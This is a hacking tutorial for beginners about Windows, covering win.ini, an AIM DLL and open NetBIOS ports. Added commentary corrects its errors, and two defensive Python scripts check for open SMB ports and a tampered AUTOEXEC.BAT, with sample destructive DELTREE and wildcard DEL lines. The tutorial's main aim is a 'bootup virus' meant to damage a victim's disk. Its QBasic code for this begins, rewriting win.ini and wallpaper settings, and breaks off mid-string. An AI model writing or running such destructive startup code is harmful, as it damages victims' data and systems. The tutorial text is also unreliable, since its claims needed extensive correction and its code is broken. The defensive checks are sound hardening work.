Hacking Windows for The Complete Newbie, Part 2
By: SLIPStream (formerly known as Morbos or Dynamite)
Contact information is located at the end of the file.

(Please note: "Newbie" is not meant as a put-down. All great hackers were once newbies, so please don't get POed about the terminology!) :)

WARNING: This file contains some elements which are considered illegal in most countries, including the United States. The author assumes no responsibility for the actions of the reader after reading this file. The reader hereby understands that the file is for educational purposes ONLY. The author does not encourage illegal activity and cannot be held responsible for the reader's actions. If you agree to this, proceed in reading the file; otherwise, please exit now.

Ok. If you read Part 1 of this text file you should have no problem understanding this one. This file contains a lot of code, so you need some compilers. First of all, download these. They're good tools for you to have as a hacker:

QBasic 4.5
Dev-C++ (or use another C++ compiler)
Cain and Abel password cracker
L0phtCrack
AIM (AOL Instant Messenger)
Java2 SDK
NASM for Windows
FileBinder

Once you have all this stuff you can get started. This file assumes that you have read the previous part (Part 1).

Section 1: H4X0R 3L337 73RM1N0L0GY (Hacker Eleet Terminology)

On the internet you're going to meet a lot of hackers who claim to be "3L33T" (eleet). I probably wouldn't take their word for it. Most of them are probably script kiddies (explained later). But who knows, maybe some of them really are 3L33T ;) Anyway, here is some hacker terminology that you should become familiar with:

Firewall: Software (or a dedicated device) that filters the network traffic going in and out of a computer or network according to a set of rules. It is one of the main tools for "hardening the target".

"Hardening the Target": Old hacker saying: no computer is unbreakable, but a computer can be "hardened" against attackers by closing services it doesn't need, applying patches and adding controls such as a firewall. This term is popular with security experts.

Router: A hardware device which forwards traffic between networks; in a home setup it sits between the computer(s) and the internet.
Multiple computers can be attached to the same router. Normally it is used for networking, but a single computer can sit behind its own router too.

Programming: If you don't know this one by now, then you should probably take a step back and read about it. A program is a set of instructions which tells the computer what to do.

TCP/IP: Transmission Control Protocol/Internet Protocol. Basically, this is the family of protocols the internet runs on. There's more to it than I could possibly explain in one text file.

Grid: A network of many computers pooled together so that they work as one big machine on a job. Normally used by large corporations and research labs.

Node: Any single computer attached to a larger network.

OS: Operating System. Explained later.

That's not the half of it, but it's enough to get you through this tutorial.

Section 2: I'm lost

I'm sure you probably are. Don't take too big a bite out of the computer world or you'll get completely lost. In the world of computers, things can get really hard, really fast. Assuming that you read the last part, let's get started.

CODING!!!!

As a hacker, you're going to be doing a lot of coding. Hacking isn't instant. It requires work and effort. Your first languages should be C, C++, Python, and if you're witty, QBasic. What??? QBasic??? You newb! No. No matter what people say, QBasic remains one of the classic programming languages (not to mention one of the easiest and most effective). The one thing missing from QBasic is any way to speak TCP/IP from the language itself (apart from shelling out to the DOS net commands).

Pretend you already know some programming (you should read some files on it). You need to know how to exploit! Exploiting is the act of finding a flaw in a computer system (or in a program or operating system) and using that flaw to break into the selected system.
These exploits are usually created through a process of reverse engineering and vulnerability research, which goes roughly like this:

  Program or operating system
            |
            v
  Decompile or disassemble the code (or just watch how it behaves)
            |
            v
  Spot the visible flaws
            |
            v
  Write code, or perform an action, that exploits the flaw

In case that wasn't clear, here's an example. A computer hacker is looking at a list of his open ports to see how he can harden his computer when he notices that the NetBIOS session port (TCP 139) is listening. He does some research and discovers that this port is used for file and printer sharing. He asks around on some hacker BBSs and finds out that not many Windows users know about this, and that they leave their shares without a password. So he finds out how to connect to this port and writes a simple batch file that takes advantage of the unprotected shares. Get it? With this knowledge, you too can write exploit code.

Let's start off with some pre-made "exploits":

win.ini flaws - The file is called win.ini on every version of Windows (there is no "windows.ini"). It is a leftover from 16-bit Windows: it holds font settings, the MCI media-type mappings and a few entries that old programs still read and write. It does not control file sharing or which program runs for a file extension; on XP and the rest of the NT family most of its sections are even redirected into the registry (the IniFileMapping key), and file associations live under HKEY_CLASSES_ROOT. It is still worth reading, because older applications dump interesting things into it. Here is a piece of a win.ini file (the "part" labels are mine, so I can refer to the sections below):

; for 16-bit app support

part 1:
[fonts]

part 2:
[extensions]

part 3:
[mci extensions]

part 4:
[files]

part 5:
[Mail]
MAPI=1
CMC=1
CMCDLLNAME=mapi.dll
CMCDLLNAME32=mapi32.dll
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1

part 6:
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo2
asx=MPEGVideo2
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo2
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo2
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo2
wm=MPEGVideo2
wma=MPEGVideo2
wmv=MPEGVideo2
wmx=MPEGVideo2
wvx=MPEGVideo2

part 7:
[WAOL]
AppPath=E:\Program Files\America Online 9.0
SharedPath=E:\Program Files\Common Files\AOLSHARE

Ok, let's break it down. Part 1, [fonts]: absolutely nothing interesting here. Even if you could, it would be boring to exploit a user's fonts.
[extensions] - Normally there would be something here, but this computer has no entries; on modern Windows the file associations live in the registry instead.

[Mail] - This computer supports MAPI. What's MAPI? No, it's not the old arcade game. MAPI is the Messaging Application Programming Interface, a Windows API that mail clients (Outlook, for example) use to send and read mail. It is an interface between programs, not a wire protocol; the protocols mail actually travels over are SMTP (sending) and POP3 or IMAP (receiving). The CMCDLLNAME entries name the DLLs (mapi.dll, mapi32.dll) that implement it.

[MCI Extensions.BAK] - Not much to exploit here. This section maps file extensions to MCI (Media Control Interface) device types, so that MCI-based players know which driver plays which file. You might think that injecting the line

exe=MPEGVideo

at the end of this section would force Windows to hand .exe files to its default MPEG player (such as Windows Media Player) instead of running them. It won't, for two reasons: a section whose name ends in .BAK is a backup copy that nothing reads, and MCI extension mappings are only consulted by MCI-aware media players, never by Explorer when it launches a file. What runs for an extension is decided by the registry (HKEY_CLASSES_ROOT), not by win.ini. Anybody who adds a line like that only leaves evidence that the file was edited.

[WAOL] - Apparently this user uses AOL. Hehe. AOL is very easy to exploit, as explained in the last part. The two paths show where AOL 9.0 and its shared files are installed.

Well, not much can be exploited from here. BUT WAIT!!! There was a DLL file listed in part 5! Let's run a search.

Searching for MAPI.DLL... 5 files found. Did you find what you wanted? Let's take a look:

sfmapi.dll
MAPI.DLL
HMMAPI.DLL
HIPMAPI.DLL
aimapi.dll

Let's look into MAPI.DLL... WHOAH!!! Tons of unreadable junk. That isn't encryption, though: a DLL is compiled machine code, and you need a disassembler (or at least a strings tool, to pull out the readable text) to make sense of it. Nothing to exploit here just by opening it in Notepad. What's that last thing on the list? aimapi.dll? Wait... that's not artificial intelligence MAPI... it's the AIM API!!!! What's that? An API is an application programming interface: the set of functions a program or library exposes so that other programs can use it without rewriting that code over and over again. Let's look inside... Hmm, wait! There are readable strings in here! Take a look for yourself; it's located in C:\Program Files\AIM and the file's named aimapi.dll. Open it up and look at the text that survives among the code:

%BASE%\aim.exe

This is about the only real help in the file. Hmm... What does it mean? %BASE% must be a placeholder for AIM's install directory, and aim.exe, well, that's self-explanatory. This really isn't very much help, but it does tell us the DLL knows how to find and launch AIM. Ok, first of all, let's write some code.
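Before writing any code, here is a pair of hardening checks for the two things we just looked at: the open NetBIOS port from the example above, and the idea of somebody editing [MCI Extensions] in win.ini. This is added example code, not from the original file: the netstat output and the win.ini text are constructed samples embedded in the script (the win.ini one is a shortened copy of the fragment above with the proposed exe=MPEGVideo line added to the .BAK section), and the function and constant names are my own. It is written in Python rather than QBasic because QBasic has nothing as convenient as configparser for this kind of text.

```python
"""Two local hardening checks (added example, not the original file's code):
 1. find NetBIOS/SMB sockets open to the network in 'netstat -an' output;
 2. find executable extensions mapped in any win.ini [MCI Extensions*] section.
All inputs below are constructed samples."""
import configparser

# Constructed 'netstat -an' output in the Windows layout (sample data).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1046       64.12.24.1:5190        ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:138            *:*
"""

# 137/udp name service, 138/udp datagram service, 139/tcp session service
# (NetBIOS over TCP/IP), 445/tcp SMB direct hosting (Windows 2000 and later).
NETBIOS_SMB_PORTS = {137, 138, 139, 445}


def netbios_smb_listeners(netstat_text):
    """Return (proto, address, port) for every NetBIOS/SMB socket that is
    reachable from the network, i.e. listening and not bound to loopback."""
    found = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] not in ("TCP", "UDP") or ":" not in parts[1]:
            continue
        addr, port = parts[1].rsplit(":", 1)
        if not port.isdigit():
            continue
        port = int(port)
        # UDP sockets have no state column; TCP ones must say LISTENING.
        listening = parts[0] == "UDP" or (len(parts) > 3 and parts[3] == "LISTENING")
        if listening and port in NETBIOS_SMB_PORTS and not addr.startswith("127."):
            found.append((parts[0], addr, port))
    return sorted(found, key=lambda f: (f[0], f[2]))


# Constructed win.ini, shortened from the fragment quoted above.
CLEAN_WIN_INI = r"""; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
[MCI Extensions.BAK]
mp3=MPEGVideo2
wmv=MPEGVideo2
[WAOL]
AppPath=E:\Program Files\America Online 9.0
"""

# The same file after the edit discussed above (exe=MPEGVideo in the .BAK section).
TAMPERED_WIN_INI = CLEAN_WIN_INI.replace("wmv=MPEGVideo2\n", "wmv=MPEGVideo2\nexe=MPEGVideo\n")

# MCI only dispatches media files to playback drivers, so an executable type
# in an MCI map is never legitimate; it means somebody edited the file by hand.
EXECUTABLE_EXTS = {"exe", "com", "bat", "cmd", "scr", "pif", "vbs", "js", "dll"}


def parse_win_ini(text):
    """Parse win.ini-style text; ';' comments, '=' delimiters, no interpolation
    (values contain backslashes and may contain '%')."""
    cp = configparser.ConfigParser(allow_no_value=True, delimiters=("=",),
                                   comment_prefixes=(";",), interpolation=None,
                                   strict=False, empty_lines_in_values=False)
    cp.read_string(text)
    return cp


def suspicious_mci_mappings(text):
    """Return (section, ext, device, active) for executable extensions found in
    any [MCI Extensions*] section. active is False for a .BAK section, which
    nothing reads: a hit there proves tampering but changes no behaviour."""
    cp = parse_win_ini(text)
    hits = []
    for section in cp.sections():
        if not section.lower().startswith("mci extensions"):
            continue
        for ext, device in cp.items(section):      # keys are lower-cased by configparser
            if ext in EXECUTABLE_EXTS:
                hits.append((section, ext, device, not section.lower().endswith(".bak")))
    return hits


if __name__ == "__main__":
    print("NetBIOS/SMB listeners:", netbios_smb_listeners(SAMPLE_NETSTAT))
    print("clean win.ini:", suspicious_mci_mappings(CLEAN_WIN_INI))
    print("tampered win.ini:", suspicious_mci_mappings(TAMPERED_WIN_INI))
```

On a real machine you would feed the output of netstat -an and the contents of C:\WINDOWS\win.ini into these two functions. The sample reports 139 and 445 on TCP plus 137 and 138 on UDP bound to 0.0.0.0 (the loopback-only socket is ignored), and it reports the exe=MPEGVideo line as an inactive hit because it sits in a .BAK section.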
This one is going to be a bootup virus. What is a bootup virus? A bootup virus is simply a virus that executes during startup! Doi! ;) Ok, here we go. Open up your QBasic compiler and let's get started!

First of all we need to know what a boot virus is. A real boot-sector virus is normally written in assembly; it writes itself into the boot sector (or master boot record) of a disk so that it runs before the operating system even loads, which is what makes it so hard to detect and clean from inside Windows. This one is far simpler: a batch file bound to an .exe. The program will be small enough to send over a 56k dialup line, but big enough not to arouse suspicion. It overwrites AUTOEXEC.BAT (the file DOS and Windows 9x run at startup) with its own commands. This code is malicious, so it will do real damage to the victim's hard disk, but it will not completely destroy it. The effects are reversible, but it will cause the target a lot of frustration.

Ok, let's start by taking a look at AUTOEXEC.BAT.

WARNING! This trick will not work on Windows XP. The reason is not the filesystem (XP runs on NTFS or FAT32 either way) but the boot process: XP and the rest of the NT family do not boot through DOS, so C:\AUTOEXEC.BAT is never executed as a startup script. XP only parses it for environment variables, and the DOS box (NTVDM) uses its own autoexec.nt in the system32 directory instead. XP's startup programs come from the Run keys in the registry and the Startup folder, not from a batch file.

On Windows 9x it should be located at C:\AUTOEXEC.BAT. Open it with Notepad or the DOS EDIT command. Now you can look at it and see what is executed on your computer at startup.
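Since the whole point of opening AUTOEXEC.BAT is to see what runs at startup, here is a small check that reads one and flags what a tampered copy would contain: commands that exist only to destroy data, wildcard deletes, and programs launched that are not part of a normal DOS/Win9x startup. This is an added example, not code from the original file; both batch files below are constructed samples, and the lists of "benign" and "destructive" commands are my own choices that you would tune for your machine.

```python
"""Audit an AUTOEXEC.BAT for signs of tampering (added example, not the
original file's code). The two batch files below are constructed samples."""
import re

# Commands whose only purpose in a startup file is to destroy data.
DESTRUCTIVE = {"deltree", "format", "fdisk"}
# Delete commands that are fine for single files but suspicious with wildcards.
DELETERS = {"del", "erase", "rd", "rmdir"}
# Commands that are normal in a DOS/Win9x AUTOEXEC.BAT (my list; extend it).
BENIGN = {"set", "path", "prompt", "echo", "rem", "mode", "keyb", "doskey",
          "smartdrv", "mscdex", "cls", "ver", "if", "goto", "country", "share"}
# Commands that merely run the program named in their first argument.
WRAPPERS = {"lh", "loadhigh", "call"}

CLEAN_AUTOEXEC = r"""@ECHO OFF
REM Sound card settings
SET BLASTER=A220 I5 D1 H5 P330 T6
PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
LH C:\WINDOWS\COMMAND\MSCDEX.EXE /D:MSCD001
DOSKEY /INSERT
"""

TAMPERED_AUTOEXEC = r"""@ECHO OFF
DELTREE /Y C:\MYDOCU~1
DEL C:\WINDOWS\*.INI
C:\WINDOWS\UPDATER.EXE
"""


def _program_name(token):
    """'C:\\WINDOWS\\COMMAND\\MSCDEX.EXE' -> 'mscdex'."""
    name = token.rsplit("\\", 1)[-1].lower()
    return re.sub(r"\.(exe|com|bat)$", "", name)


def parse_batch(text):
    """Yield (lineno, command, args) for every command in a batch file.
    Blank lines and labels are skipped, a leading '@' is dropped, each side
    of a pipe is its own command, and PATH=... / SET X=Y are split at '='."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(":"):
            continue
        for part in line.lstrip("@").split("|"):
            tokens = part.split()
            if not tokens:
                continue
            cmd, args = tokens[0].split("=", 1)[0], tokens[1:]
            if cmd.lower() in WRAPPERS and args:      # LH prog / CALL prog
                cmd, args = args[0], args[1:]
            yield lineno, _program_name(cmd), args


def audit_autoexec(text):
    """Return (lineno, reason, command) for each suspicious line."""
    findings = []
    for lineno, cmd, args in parse_batch(text):
        if cmd in DESTRUCTIVE:
            findings.append((lineno, "destructive command", cmd))
        elif cmd in DELETERS and any(c in a for a in args for c in "*?"):
            findings.append((lineno, "wildcard delete", cmd))
        elif cmd not in BENIGN and cmd not in DELETERS:
            findings.append((lineno, "unrecognized program", cmd))
    return findings


if __name__ == "__main__":
    print("clean:", audit_autoexec(CLEAN_AUTOEXEC))
    print("tampered:", audit_autoexec(TAMPERED_AUTOEXEC))
```

The clean sample produces no findings; the tampered one is flagged on three lines. A plain DEL of one file is deliberately not reported, since cleaning up a temp file at boot is normal, while DEL with a wildcard is.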
Ok, here's some QBasic code:

'******Start Copying Here*******
DIM line1 AS STRING
DIM line2 AS STRING
DIM line3 AS STRING
DIM line4 AS STRING
DIM line5 AS STRING
DIM win1 AS STRING
DIM win2 AS STRING
DIM win3 AS STRING
DIM win4 AS STRING
DIM win5 AS STRING
DIM win6 AS STRING
DIM win7 AS STRING
DIM win8 AS STRING
DIM background AS STRING
DIM background1 AS STRING
win1 = "[fonts]"
win2 = "[extensions]"
win3 = "[mci extensions]"
win4 = "[files]"
win5 = "[MCI Extensions.BAK]"
win6 = "[WAOL]"
win7 = "AppPath=C:\AUTOEXEC.BAT"
win8 = "SharedPath=E:\Program Files\Common Files\AOLSHARE"
'Important stuff
background = "[Desktop]"
background1 = "Wallpaper=C:\WINDOWS\SYS32x1.html"
html1 = "
html4 = "